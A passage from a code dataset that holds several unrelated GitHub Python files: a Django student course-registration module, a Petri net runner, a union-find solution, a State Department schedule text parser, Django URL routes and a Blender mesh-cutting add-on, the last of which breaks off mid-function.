{\n 'student_id': int(nuid),\n 'course_list': [],\n 'complete_courses': [],\n 'pending_list': [],\n }\n\n for course in getAllCourseInfo():\n res['course_list'].append({'course_num': course[0], 'course_name': course[1],\n 'instructor': getInstructorNameById(course[2]), 'meeting_time': str(course[3]),\n 'date': course[12],\n 'capacity': course[4], 'semester': course[5],\n 'semester_hrs': course[6],\n 'cur_registered': course[7]})\n\n res['complete_courses'] = getCompleteCoursesByNuid(nuid)\n\n context = {\n \"data\": res\n }\n\n cursor.close()\n return render(request, 'student/course_registration.html', context)\n\n\n# This method takes two variable, arr stands for a fetched two dimensional array,\n# check if the emplpoyee_id is a valid or not.\ndef isValidAdvisorId(arr, employee_id):\n for i in range(len(arr)):\n if employee_id == arr[i][0]:\n return True\n\n return False\n\n\ndef getNameByCourseNum(course_id):\n cursor = connection.cursor()\n course_id = {'course_id': course_id}\n cursor.execute('''SELECT course_name FROM course WHERE course_id = %(course_id)s''', course_id)\n cursor.close()\n\n return cursor.fetchall()[0][0]\n\n\n# Retrieve all information from the course list.\ndef getCourseList():\n cursor = connection.cursor()\n res = []\n cursor.execute('''SELECT * FROM course''')\n course_list = cursor.fetchall()\n if course_list:\n for course_id in course_list:\n res.append(course_id)\n\n cursor.close()\n return res\n\n\n# Input takes student NUID, query the registration table, retrieve all courses id that the student has completed.\ndef getCompleteCoursesByNuid(student_id):\n cursor = connection.cursor()\n res = []\n student_id = {'student_id': student_id}\n cursor.execute('''SELECT course_id FROM registration WHERE nuid = %(student_id)s AND status = 'completed' ''',\n student_id)\n results = cursor.fetchall()\n\n if results:\n for r in results:\n res.append(r[0])\n cursor.close()\n\n return res\n\n\n# Student Table\n# Get semester hour courses student registered.\ndef getStudentCurSh(student_id, course_id):\n sh = 0\n cursor = connection.cursor()\n for c in getCourseCurrentlyTakingOrPending(student_id):\n cursor.execute('''SELECT semester_hrs FROM course where course_id = %(course_id)s ''',\n {'course_id': c})\n sh += cursor.fetchall()[0][0]\n\n cursor.execute('''SELECT semester_hrs FROM course where course_id = %(course_id)s ''',\n {'course_id': course_id})\n sh += cursor.fetchall()[0][0]\n\n return sh\n\ndef getStudentMaxSh(student_id):\n cursor = connection.cursor()\n cursor.execute('''SELECT semesterhour FROM student WHERE nuid = %(student_id)s''',\n {'student_id': student_id})\n res = cursor.fetchall()[0][0]\n cursor.close()\n\n return res\n\n# Get student id list.\ndef getStudentIdList():\n cursor = connection.cursor()\n cursor.execute('''SELECT nuid FROM student''')\n res = cursor.fetchall()\n cursor.close()\n\n return res[0]\n\n\n# Given a student nuid, check if this nuid in student list.\ndef isValidNuid(student_id):\n cursor = connection.cursor()\n cursor.execute('''SELECT nuid FROM student''')\n cursor.close()\n\n return student_id in cursor[0]\n\n\n# Given student id, calculate the cumulative GPA that student have so far.\ndef calculateStudentGpa(student_id):\n cursor = connection.cursor()\n cursor.execute('''SELECT * FROM registration WHERE (status = 'failed' OR status = 'completed') ''')\n comp_list = cursor.fetchall()\n\n cum_sh = 0\n cum_gpa = 0.0\n\n if comp_list:\n for comp in comp_list:\n if comp[0] == int(student_id):\n cursor.execute('''SELECT semester_hrs FROM course WHERE course_id = %(course_id)s''',\n {'course_id': comp[1]})\n # Semester hours.\n sh = cursor.fetchall()[0][0]\n cum_sh += sh\n cum_gpa += sh * min(4.0, comp[3])\n\n if cum_sh == 0:\n return 0\n cursor.close()\n return round(cum_gpa / cum_sh, 2)\n\n\n# The method takes student nuid as input,\ndef updateStudentGpa(student_id):\n cursor = connection.cursor()\n gpa = calculateStudentGpa(student_id)\n cursor.execute('''UPDATE student SET grade = %(gpa)s WHERE nuid = %(student_id)s ''',\n {'gpa': gpa, 'student_id': student_id})\n cursor.close()\n\n\n# Update all students GOA in the student list.\ndef updateAllStudentGpa():\n for s in getStudentIdList():\n updateStudentGpa(s)\n\n\n# Registration Table\n# Get all informatin from registration table.\ndef getAllRegistrationInfo():\n cursor = connection.cursor()\n cursor.execute('''SELECT * FROM registration''')\n res = cursor.fetchall()\n cursor.close()\n\n return res\n\n\n# Remove status equals 'rejected' rows form registration table.\ndef removeRejFromRegistration():\n cursor = connection.cursor()\n cursor.execute('''DELETE FROM registration WHERE status = 'rejected' ''')\n\n\n# The methods takes a course numer, student id, return the status of the student for this course.\ndef getStudentCourseStatus(student_id, course_id):\n cursor = connection.cursor()\n cursor.execute('''SELECT status FROM registration WHERE nuid = %(student_id)s AND\n course_id = %(course_id)s''', {'student_id': student_id, 'course_id': course_id})\n res = cursor.fetchall()\n cursor.close()\n\n if not res:\n return 'Null'\n elif res[0][0] == 'pending':\n return 'Pending for approval'\n\n return res[0][0]\n\n\n# This method takes student nuid as input, return a course number list that contain courses the student currently\n# taking or pending for advisor to approve.\ndef getCourseCurrentlyTakingOrPending(student_id):\n cursor = connection.cursor()\n res = []\n cursor.execute('''SELECT course_id FROM registration where nuid = %(student_id)s AND (status = 'approved' OR\n status = 'pending') ''', {'student_id': student_id})\n for c in cursor.fetchall():\n res.append(c[0])\n cursor.close()\n return res\n\n\n# The method takes student nuid as input, return list that contain courses student currently taking.\ndef getCourseInProgress(student_id):\n cursor = connection.cursor()\n cursor.execute('''SELECT course_id FROM registration WHERE nuid = %(student_id)s AND status = 'approved'\n ''', {'student_id': student_id})\n res = []\n\n for data in cursor.fetchall():\n res.append(data[0])\n cursor.close()\n\n return res\n\n\n# Input takes a student NUID, get all course numbers that the student submitted registration form and still pending\n# for advisor approval.\ndef getPendingApprovals(student_id):\n cursor = connection.cursor()\n res = []\n student_id = {'student_id': int(student_id)}\n cursor.execute('''SELECT course_id FROM registration WHERE status = 'pending' AND nuid = %(student_id)s''',\n student_id)\n pending_list = cursor.fetchall()\n if pending_list:\n for r in pending_list:\n if r[0] in res:\n continue\n res.append(r[0])\n\n cursor.close()\n return res\n\n\n# Advisor Table\n# The method takes student nuid as input, return student's advisor id.\ndef getAdvisorByStudentId(student_id):\n cursor = connection.cursor()\n student_id = {'student_id': student_id}\n cursor.execute('''SELECT advisor FROM student WHERE nuid = %(student_id)s''', student_id)\n cursor.close()\n return cursor.fetchall()[0][0]\n\n\n# Admin Table\n\n\n# Course Table\n# Update student enrollment of designated courses based on the information in Registration table.\ndef updateEnrolledStudents(course_id):\n cursor = connection.cursor()\n stu_enrollment = 0\n cursor.execute('''SELECT * FROM registration WHERE course_id = %(course_id)s''', {'course_id': course_id})\n\n for ea in cursor.fetchall():\n if ea[4] == 'approved':\n stu_enrollment += 1\n cursor.execute('''UPDATE course set registered_num_of_stud = %(stu_enrollment)s WHERE course_id = \n %(course_id)s ''', {'stu_enrollment': stu_enrollment, 'course_id': course_id})\n\n\n# Get course time by course id.\ndef getCourseTime(course_id):\n res = []\n cursor = connection.cursor()\n cursor.execute('''SELECT meeting_time FROM course WHERE course_id = %(course_id)s''', {'course_id': course_id})\n res.append(str(cursor.fetchall()[0][0]))\n cursor.execute('''SELECT date FROM course WHERE course_id = %(course_id)s''', {'course_id': course_id})\n\n res.append(str(cursor.fetchall()[0][0]))\n cursor.close()\n\n return res\n\n\n# The method takes course id as input, return if the course has reached it's capacity.\ndef isCourseFull(course_id):\n cursor = connection.cursor()\n cursor.execute('''SELECT max_num_of_students FROM course WHERE course_id = %(course_id)s''',\n {'course_id': course_id})\n cap = cursor.fetchall()[0][0]\n cursor.execute('''SELECT registered_num_of_stud FROM course WHERE course_id = %(course_id)s''',\n {'course_id': course_id})\n cur_num = cursor.fetchall()[0][0]\n cursor.close()\n return cur_num >= cap\n\n\n# Course Table\ndef getCourseNameByCourseNum(course_num):\n cursor = connection.cursor()\n cursor.execute('''SELECT course_name FROM course WHERE course_id = %(course_num)s''', {'course_num': course_num})\n res = cursor.fetchall()\n cursor.close()\n\n return res[0][0]\n\n\n# Get all information from course table.\ndef getAllCourseInfo():\n cursor = connection.cursor()\n cursor.execute('''SELECT * FROM course''')\n res = cursor.fetchall()\n cursor.close()\n\n return res\n\n\n# Get course number list.\ndef getCourseNumList():\n cursor = connection.cursor()\n cursor.execute('''SELECT course_id FROM course''')\n res = []\n\n for c in cursor.fetchall():\n res.append(c[0])\n cursor.close()\n\n return res\n\n# Instructor Table\ndef getInstructorNameById(instructor_id):\n cursor = connection.cursor()\n cursor.execute('''SELECT name FROM instructor WHERE employee_id = %(employee_id)s ''',\n {'employee_id': instructor_id})\n res = cursor.fetchall()\n\n if res:\n return res[0][0]\n\n return \"\"\n\n\n# Util Library\ndef timeConversion(date, time):\n date_map = {'M': 1, 'T': 2, 'W': 3, 'Th': 4, 'F': 5, 'S': 6, 'S': 7}\n # Convert to seconds.\n one_day = 24 * 60\n hour = int(time[0 : 2])\n min = int(time[3 : 5])\n time_to_min = one_day * (date_map[date] - 1) + hour * 60 + min\n\n return time_to_min\n\n\ndef isConflict(student_id, course_id):\n course_time = getCourseTime(course_id)\n if course_time[1] is None:\n return False\n\n abs_course_time = timeConversion(course_time[1], course_time[0])\n reg_courses_time_interval = []\n\n for interval in getAllRegistrationInfo():\n if interval[0] == student_id and (interval[4] == 'pending' or interval[4] == 'approved'):\n course = interval[1]\n ct = timeConversion(getCourseTime(course)[1], getCourseTime(course)[0])\n reg_courses_time_interval.append([ct, ct + 180])\n\n for ea in reg_courses_time_interval:\n if ea[0] < abs_course_time + 180 < ea[1] or ea[0] < abs_course_time < ea[1]:\n return True\n\n return False\n\n\n# Grade letter gpa conversion:\n# A+: 4.33 A: 4.00 A-: 3.66\n# B+: 3.33 B: 3.00 B-: 2.66\n# C+: 2.33 C: 2.00 C-: 1.66\n# D+: 1.33 D: 1.00 D-: 0.66\n# F: 0.00\ndef getGrade(grade):\n if grade < 0.66:\n return 'F'\n if grade < 1.0:\n return 'D-'\n if grade < 1.33:\n return 'D'\n if grade < 1.66:\n return 'D++'\n if grade < 2:\n return 'C-'\n if grade < 2.33:\n return 'C'\n if grade < 2.66:\n return 'C+'\n if grade < 3:\n return 'B-'\n if grade < 3.33:\n return 'B'\n if grade < 3.66:\n return 'B+'\n if grade < 4.00:\n return 'A-'\n if grade < 4.33:\n return 'A'\n\n return 'A+'\n","repo_name":"smoring2/khouryWebRegistration","sub_path":"studentInfo/student_views.py","file_name":"student_views.py","file_ext":"py","file_size_in_byte":18734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12117452696","text":"from random import choice\nfrom petri_net import Place, PetriNet, Transition, In, Out\n\n# initialize list of token\nM0 = [1, 2, 3, 2]\nps = [Place(m) for m in M0]\n\n# create graph of PetriNet\n\"\"\"\nExample:\n---------------<--------------------\n| |\n|--> P0 --> *T1* --> P1 --> *T2* --|\n | / \\\n | / \\---> P3\n P2 ----------/\n\"\"\"\nts = dict(\n t1=Transition(\n [In(ps[0])],\n [Out(ps[1]), Out(ps[2])]\n ),\n t2=Transition(\n [In(ps[1]), In(ps[2])],\n [Out(ps[3]), Out(ps[0])]\n )\n)\n\nnum_fires = 3\n# random fire in dict of transitions\nfiring_sequence = [choice(list(ts.keys())) for _ in range(num_fires)]\n\n# Or you can hand-choice transition will be fire (length = num_fires)\n# firing_sequence = ['t1', 't2', 't1']\n\nnetwork = PetriNet(ts)\nnetwork.run(firing_sequence, ps)\n","repo_name":"doantienthongbku/petrinet_python","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9237597956","text":"class Solution:\n def removeStones(self, stones: List[List[int]]) -> int:\n n=len(stones)\n par={i:i for i in range(n)}\n rank=[1]*n\n def find(st):\n while par[st]!=st:\n par[st]=par[par[st]]\n st=par[st]\n return st\n def union(st1,st2):\n \n parst1=find(st1)\n parst2=find(st2) \n if parst1!=parst2 :\n if rank[st1]>rank[st2]:\n par[parst2]=parst1\n rank[parst1]+=rank[parst2]\n rank[parst2]=0\n else:\n par[parst1]=parst2\n rank[parst2]+=rank[parst1] \n rank[parst1]=0 \n for i in range(n):\n row1,col1=stones[i]\n for j in range(i+1,n):\n row2,col2=stones[j]\n if row1==row2 or col1==col2:\n union(i,j)\n\n for i in rank:\n if i!=0:\n n-=1\n return n\n","repo_name":"Zablon5/A2SV","sub_path":"July(2023)-week-2/leet-code-947.py","file_name":"leet-code-947.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39069496207","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 16 10:05:26 2022\n\n@author: xintao\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\nimport re\n\n\ndef travel_destinations(text):\n# Read info about travel destinations in text\n if \"travel to\" not in text and 'travels to' not in text:\n raise ValueError('No travel info in input!')\n else:\n tx=text\n a=tx.find('travel to')\n if a!=-1:\n a=a+10\n else:\n a=tx.find('travels to')+11\n b1=tx[a:].find(' from ')\n b2=tx[a:].find(' on ')\n b3=tx[a:].find('.')\n b4=tx[a:].find(' January')\n b5=tx[a:].find(' February') \n b6=tx[a:].find(' March')\n b7=tx[a:].find(' April')\n b8=tx[a:].find(' May')\n b9=tx[a:].find(' June')\n b10=tx[a:].find(' July')\n b11=tx[a:].find(' August') \n b12=tx[a:].find(' September')\n b13=tx[a:].find(' October')\n b14=tx[a:].find(' November')\n b15=tx[a:].find(' December')\n b16=tx[a:].find(' to ')\n if b1==-1:\n b1=1000\n if b2==-1:\n b2=1010\n if b3==-1:\n b3=1000\n if b4==-1:\n b4=1000\n if b5==-1:\n b5=1010\n if b6==-1:\n b6=1000\n if b7==-1:\n b7=1000\n if b8==-1:\n b8=1010\n if b9==-1:\n b9=1000\n if b10==-1:\n b10=1000\n if b11==-1:\n b11=1010\n if b12==-1:\n b12=1000\n if b13==-1:\n b13=1000\n if b14==-1:\n b14=1010\n if b15==-1:\n b15=1000\n if b16==-1:\n b16=1000\n b=min(b1,b2,b3,b4,b5,b6,b7,b8,b9,b10,b11,b12,b13,b14,b15,b16)\n places=tx[a:a+b]\n return countries_in_it(places)\n\ndef fix_dates(text):\n # correct dates format and spelling in text\n month_list=['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December', 'Oct']\n for mon in month_list:\n loc=text.find(mon)\n if loc!=-1:\n correct=text[loc-1:loc+len(mon)+1]\n if correct[-1]!=' ':\n # handles the case where space is missing\n text=text.replace(mon,mon+' ')\n if correct[0]!=' ':\n # handles the case where space is missing\n text=text.replace(mon,' '+mon)\n return text\n \n \ndef travel_dates(dates,text):\n # Read travel related dates in text\n dates=datetime.strptime(dates,\"%d-%b-%y\")\n mts={'January':1,\n 'February':2,\n 'March':3,\n 'April':4,\n 'May':5,\n 'June':6,\n 'July':7,\n 'August':8,\n 'September':9,\n 'October':10,\n 'November':11,\n 'December':12,\n 'Oct':11,\n }\n if \"travel to\" not in text and 'travels to' not in text:\n #raise ValueError('No travel info in input!')\n mts\n else:\n tx=fix_dates(text)\n a=tx.find('travel to')\n if a!=-1:\n a=a+10\n else:\n a=tx.find('travels to')+11\n tx=tx[a:]\n year_list=np.arange(1990,2030).astype(str)\n month_list=list(mts.keys())\n \n months=[]\n days=[]\n\n tx=tx.replace('–',' ')\n tx=tx.replace('-',' ')\n tx=tx.replace('—',' ')\n tx=tx.replace(',',' ')\n tx=tx.replace(';',' ')\n tx=tx.replace('.',' ')\n txl=tx.split(' ')\n for txi in txl:\n if txi.isdigit():\n if int(txi)<1000:\n days.append(txi)\n if txi in month_list:\n months.append(txi)\n monthdigit=[] \n for mon in months:\n monthdigit.append(mts[mon])\n \n monthdigit=list(set(monthdigit))\n\n if len(monthdigit)==1 and len(days)==1:\n start_date=str(monthdigit[0])+'-'+days[0]\n end_date=str(monthdigit[0])+'-'+days[0]\n \n if len(monthdigit)==1 and len(days)==2:\n start_date=str(monthdigit[0])+'-'+days[0]\n end_date=str(monthdigit[0])+'-'+days[1]\n \n if len(monthdigit)==2 and len(days)==1:\n start_date=str(monthdigit[0])+'-'+days[0]\n end_date=str(monthdigit[1])+'-'+days[0] \n \n if len(monthdigit)==2 and len(days)==2:\n start_date=str(monthdigit[0])+'-'+days[0]\n end_date=str(monthdigit[1])+'-'+days[1]\n \n if len(monthdigit)==1 and len(days)>2:\n start_date=str(monthdigit[0])+'-'+days[0]\n end_date=str(monthdigit[0])+'-'+days[-1]\n try: \n start_date=start_date+'-'+str(dates.year)\n end_date=end_date+'-'+str(dates.year)\n start_date=datetime.strptime(start_date,\"%m-%d-%Y\").date()\n end_date=datetime.strptime(end_date,\"%m-%d-%Y\").date()\n \n except: \n start_date=dates.date()\n end_date=dates.date()\n return start_date,end_date\n \n\ndef countries_in_it(text):\n # find all countries in text\n country_lookup=pd.read_csv('../Data/Forms/country_lookup.csv',index_col=0)\n countries=[]\n for a in list(country_lookup.Names):\n if a in text:\n countries.append(a)\n \n for a in list(country_lookup.Full_Names):\n if a in text:\n c=country_lookup.Names[country_lookup.Full_Names==a]\n countries.append(list(c)[0])\n \n for a in list(country_lookup.Capital):\n if a in text:\n c=country_lookup.Names[country_lookup.Capital==a]\n countries.append(list(c)[0])\n for a in list(country_lookup.Adjs):\n if a in text:\n c=country_lookup.Names[country_lookup.Adjs==a]\n countries.append(list(c)[0])\n countries=list(set(countries))\n if len(countries)==0:\n return ['Domestic']\n else:\n return countries\n\n\n \ndef make_travel_places_rank_date():\n A=pd.read_csv('../Data/Mid_data/Trump/trump_3_line_processed.csv',index_col=0)\n Rank=pd.read_csv('../Data/Forms/ranks_trump.csv',index_col=1)\n places=[]\n start_dates=[]\n end_dates=[]\n types=[]\n Ranks=[]\n Topics=[]\n Meet_countries=[]\n for i,text in enumerate(A.Texts): \n Topics.append(topics_in_it(text))\n Ranks.append(Rank.loc[A.Lastnames[i]].Rank)\n if \"travel to\" in text or 'travels to' in text:\n types.append('Travel')\n Meet_countries.append('')\n else:\n if 'attends meetings and briefings at the Department of State.' not in text and ('meet' in text.lower() or 'attend' in text.lower()):\n types.append('Meeting')\n countries_=countries_in_it(text)\n countries=''\n for country in countries_:\n countries=countries+' ; '+country\n \n Meet_countries.append(countries)\n \n else:\n types.append('TBD')\n Meet_countries.append('')\n try: \n pl=travel_destinations(text)\n place=''\n for p in pl:\n place=place+' ; '+p\n places.append(place)\n \n except:places.append(' ')\n try: \n start_date,end_date=travel_dates(A.Dates[i],text)\n start_dates.append(start_date)\n end_dates.append(end_date)\n except:\n start_dates.append('')\n end_dates.append('')\n A['Rank']=Ranks\n A['Type']=types\n A['Travel_Places']=places\n A['Travel_Start_Date']=start_dates\n A['Travel_End_Date']=end_dates\n A['Link_Content']=[' ']*len(A.Rank)\n A['Topics']=Topics\n A['Meet_countries']=Meet_countries\n A.to_csv('../Data/Mid_data/Trump/trump_4_test.csv') \n \n A=pd.read_csv('../Data/Mid_data/Biden/biden_3_line_processed.csv',index_col=0)\n Rank=pd.read_csv('../Data/Forms/ranks_biden.csv',index_col=1)\n places=[]\n start_dates=[]\n end_dates=[]\n types=[]\n Ranks=[]\n Topics=[]\n Meet_countries=[]\n for i,text in enumerate(A.Texts): \n Topics.append(topics_in_it(text))\n Ranks.append(Rank.loc[A.Lastnames[i]].Rank)\n if \"travel to\" in text or 'travels to' in text:\n types.append('Travel')\n Meet_countries.append('')\n else:\n if 'attends meetings and briefings at the Department of State.' not in text and ('meet' in text.lower() or 'attend' in text.lower()):\n types.append('Meeting')\n countries_=countries_in_it(text)\n countries=''\n for country in countries_:\n countries=countries+' ; '+country\n \n Meet_countries.append(countries)\n else:\n types.append('TBD')\n Meet_countries.append('')\n try:\n pl=travel_destinations(text)\n place=''\n for p in pl:\n place=place+' ; '+p\n places.append(place)\n \n except:places.append(' ')\n try: \n start_date,end_date=travel_dates(A.Dates[i],text)\n start_dates.append(start_date)\n end_dates.append(end_date)\n except:\n start_dates.append('')\n end_dates.append('')\n A['Rank']=Ranks\n A['Type']=types\n A['Travel_Places']=places\n A['Travel_Start_Date']=start_dates\n A['Travel_End_Date']=end_dates\n A['Link_Content']=[' ']*len(A.Rank)\n A['Topics']=Topics\n A['Meet_countries']=Meet_countries\n A.to_csv('../Data/Mid_data/Biden/biden_4_test.csv')\n\n\ndef topics_in_it(text):\n # find topics in text\n topics=[]\n security=['arms control','strategic','security','weapons','NATO']\n sec_org=['NATO','AUKUS']\n food=['food','grain','rice']\n tech=['technology',' 5g ',' ict ','artificial intelligence']\n biotech=['COVID','medical',' vaccine','bio-tech','biotech','Hygiene','Sanitation'] \n econ=['economic','trade','tariff','business','commerce','economy','investment'] \n io=['International Development Finance Corporation',' World Bank ','health',' WTO ',' IMF ', ' ITU ','UNICEF','G7'] \n nuke=['nuclear','proliferation']\n supply_chain=['supply chain','semi-conductor']\n UN=[' UN ','U.N.','United Nation']\n ASEAN=['ASEAN ','IPEF ','CPTPP ','RECP ', 'Indo Pacific']\n climate=['climate','emission',' CO2 ','carbon']\n energy=['energy',' oil ', ' petro ', ' battery ']\n finance=['Banking','finance','financial']\n China=['chinese','china','taiwan','taiwanese','hong kong','tibet','xinjiang']\n \n if any([s.lower() in text.lower() for s in security])==True:\n topics.append('security')\n if any([s.lower() in text.lower() for s in food])==True:\n topics.append('food')\n if any([s.lower() in text.lower() for s in tech])==True:\n topics.append('tech')\n if any([s.lower() in text.lower() for s in biotech])==True:\n topics.append('bio-tech')\n if any([s.lower() in text.lower() for s in econ])==True:\n topics.append('econ')\n if any([s.lower() in text.lower() for s in io])==True:\n topics.append('international_organization')\n if any([s.lower() in text.lower() for s in nuke])==True:\n topics.append('nuke')\n if any([s.lower() in text.lower() for s in supply_chain])==True:\n topics.append('supply_chain')\n if any([s.lower() in text.lower() for s in climate])==True:\n topics.append('climate')\n if any([s.lower() in text.lower() for s in energy])==True:\n topics.append('climate')\n if any([s.lower() in text.lower() for s in finance])==True:\n topics.append('finance')\n if any([s.lower() in text.lower() for s in China])==True:\n topics.append('China')\n if any([s.lower() in text.lower() for s in sec_org])==True:\n topics.append('sec_org')\n if any([s.lower() in text.lower() for s in UN])==True:\n topics.append('UN')\n if any([s.lower() in text for s in ASEAN])==True:\n topics.append('ASEAN')\n \n topic=''\n for topic_ in topics:\n topic=topic+' ; '+topic_\n\n return topic\n\nmake_travel_places_rank_date()","repo_name":"BGMjie/USDataProcess","sub_path":"Process_Code/Biden & Trump/4_line_analysis.py","file_name":"4_line_analysis.py","file_ext":"py","file_size_in_byte":12313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"14152090679","text":"import requests\nimport json \nimport time\n\n\nstart = time.time()\nurl = 'https://recommendation--api.herokuapp.com/'\ndata = 'ledger'\ndata = json.dumps(data)\nrqt = requests.post(url, data)\nend = time.time()\nprint(rqt.json())\nprint('Runtime {:.2f} seconds'.format(end-start))","repo_name":"ZarpLabs/Externship-Program","sub_path":"1st Externship Batch/Recommendation System/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70080338660","text":"def get_discount(amount):\n # Complete this function\n if amount<500:\n discount=\"5%\"\n elif (amount>=500) and (amount<2500):\n discount=\"10%\"\n else:\n discount=\"20%\"\n return discount\n\namount = int(input())\n# Call the get_discount function\nresult=get_discount(amount)\nprint(result)","repo_name":"BhavanDevOps/Full-Stack-Projects","sub_path":"Python Projects/Discount.py","file_name":"Discount.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"21124551936","text":"from django.conf.urls import url\n\nfrom taskmaster import views\n\nurlpatterns = [\n url(r'^$', views.jobgroups, name='jobgroups'),\n url(r'^jobgroups/(?P\\d+)/$', views.jobgroup, name='jobgroup'),\n\n url(r'^kickstart$', views.kickstart, name='kickstart')\n]","repo_name":"ChrisCooper/pipeline-nanny","sub_path":"taskmaster/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43133865658","text":"import bpy\nfrom . interactive import InteractiveOperator, screen_space_to_3d\nfrom . multifile import register_class, topbar_mt_app_system_add\nfrom mathutils import Vector\nimport bmesh\nfrom math import sin, cos, pi\n\n\nBLACK = Vector((0, 0, 0, 1))\nRED = Vector((1, 0, 0, 1))\nGREEN = Vector((0, 1, 0, 1))\nBLUE = Vector((0, 0, 1, 1))\nALPHA = Vector((0, 0, 0, 1))\n\n\n\n\ndef cut(context, points, thickness=0.0001, distance_multiplier=10, cyclic=True):\n origin = screen_space_to_3d((0, 0), 0, context)\n dist = context.region_data.view_distance\n end = context.space_data.clip_end\n bm = bmesh.new()\n verts = []\n for point in points:\n p1 = screen_space_to_3d(point, 1, context)\n p2 = screen_space_to_3d(point, dist * distance_multiplier, context)\n verts.append((bm.verts.new(p1), bm.verts.new(p2)))\n\n for i in range(len(verts) - 1):\n a, b = verts[i]\n c, d = verts[i + 1]\n bm.faces.new((a, b, d, c))\n\n if cyclic and len(points) > 2:\n a, b = verts[0]\n c, d = verts[-1]\n bm.faces.new((a, b, d, c))\n\n bmesh.ops.recalc_face_normals(bm, faces=bm.faces)\n bmesh.ops.solidify(bm, geom=list(bm.faces), thickness=thickness)\n bmesh.ops.recalc_face_normals(bm, faces=bm.faces)\n mesh = bpy.data.meshes.new(name='cuter_mesh')\n bm.to_mesh(mesh)\n cuter = bpy.data.objects.new(name='cuter_object', object_data=mesh)\n context.scene.collection.objects.link(cuter)\n\n for ob in list(context.view_layer.objects.selected):\n context.view_layer.objects.active = ob\n md = ob.modifiers.new(type='BOOLEAN', name='Cut')\n md.object = cuter\n md.operation = 'DIFFERENCE'\n bpy.ops.object.modifier_apply(modifier=md.name)\n bm = bmesh.new()\n bm.from_mesh(ob.data)\n bmesh.ops.holes_fill(bm, edges=bm.edges)\n bmesh.ops.triangulate(\n bm, faces=[face for face in bm.faces if len(face.verts) > 4])\n bm.to_mesh(ob.data)\n bpy.ops.object.mode_set(mode='EDIT')\n bpy.ops.mesh.select_all(action='SELECT')\n bpy.ops.mesh.separate(type='LOOSE')\n bpy.ops.object.mode_set(mode='OBJECT')\n\n bpy.data.objects.remove(cuter)\n bpy.data.meshes.remove(mesh)\n\n\ndef lerp(a, b, t):\n return a + (b - a) * t\n\n\ndef bezier_interpolate(a, b, c, d, t):\n # todo: optimize later :/\n ab, bc, cd = lerp(a, b, t), lerp(b, c, t), lerp(c, d, t)\n abbc = lerp(ab, bc, t)\n bccd = lerp(bc, cd, t)\n return lerp(abbc, bccd, t)\n\n\ndef bezier_curve_points(a, b, c, d, resolution):\n for i in range(resolution):\n yield bezier_interpolate(a, b, c, d, i / resolution)\n\n\nclass SlashToolBase:\n ortho_vecs = (Vector((0, 1)),\n Vector((1, 0)),\n Vector((1, 1)),\n Vector((1, -1)))\n\n def __init__(self):\n self.points = []\n self.cyclic = False\n self.orthogonal = False\n self.done = False\n\n def update(self):\n pass\n\n def ortho_project(self, mouse_co):\n if not self.points:\n return mouse_co\n\n vec = mouse_co - self.points[-1]\n return max((vec.project(orth) for orth in self.ortho_vecs), key=lambda v: v.dot(vec)) + self.points[-1]\n\n def grab_mode(self, mouse_co):\n\n old_points = self.points\n while True:\n new_co = yield\n self.points = [pt + new_co - mouse_co for pt in old_points]\n\n def on_click(self, mouse_co):\n pass\n\n def on_drag(self, mouse_co):\n pass\n\n def on_mousemove(self, mouse_co):\n pass\n\n def on_enter(self, mouse_co):\n self.done = True\n\n def on_wheel(self, dir):\n pass\n\n def draw(self, draw_2d, mouse_co):\n raise\n\n def undo(self, mouse_co):\n pass\n\n def cut(self, context, thickness=0.0001):\n cut(context, self.points, thickness, 50, self.cyclic)\n\n\nclass PolyCut(SlashToolBase):\n min_point_dist = 10\n\n def on_drag(self, mouse_co):\n if self.points:\n d = (mouse_co - self.points[-1]).length\n if d > self.min_point_dist * 2:\n self.points.append(0.5 * (mouse_co + self.points[-1]))\n else:\n self.points.append(mouse_co)\n\n def on_click(self, mouse_co):\n if self.points:\n end1 = self.points[0]\n end2 = self.points[-1]\n\n if (end1 - mouse_co).length < (end2 - mouse_co).length:\n closest_end = end1\n self.cyclic = True\n else:\n closest_end = end2\n self.cyclic = False\n\n d = (mouse_co - closest_end).length\n if d <= self.min_point_dist:\n self.done = True\n return\n\n self.points.append(mouse_co)\n\n def undo(self, mouse_co):\n if self.points:\n self.points.pop(-1)\n\n def draw(self, draw_2d, mouse_co):\n if len(self.points) > 1:\n for i in range(len(self.points) - 1):\n p1 = self.points[i]\n p2 = self.points[i + 1]\n draw_2d.add_line(p1, p2, color_a=BLACK)\n\n draw_2d.add_circle(mouse_co, 3, 16, RED)\n\n if self.points:\n draw_2d.add_line(self.points[-1], mouse_co, color_a=(1, 0.5, 0, 1))\n\n draw_2d.add_circle(\n self.points[-1], self.min_point_dist, 10, color=(1, 0, 0, 0.5))\n draw_2d.add_circle(\n self.points[0], self.min_point_dist, 10, color=(0, 0.2, 1, 0.5))\n\n end1 = self.points[0]\n end2 = self.points[-1]\n\n if (end1 - mouse_co).length < (end2 - mouse_co).length:\n closest_end = end1\n color = (0, 0.2, 1, 1)\n else:\n closest_end = end2\n color = (1, 0.2, 0, 1)\n\n d = (mouse_co - closest_end).length\n if d <= self.min_point_dist:\n draw_2d.add_text('click to cut', mouse_co +\n Vector((10, 10)), color=color, size=20)\n\n\nclass EllipseCut(SlashToolBase):\n\n resolution = 20\n\n def cut(self, context, thickness=0.0001):\n cut(context, list(self.ellipse_points(None)), thickness, 50, True)\n\n def ortho_project(self, mouse_co):\n if not 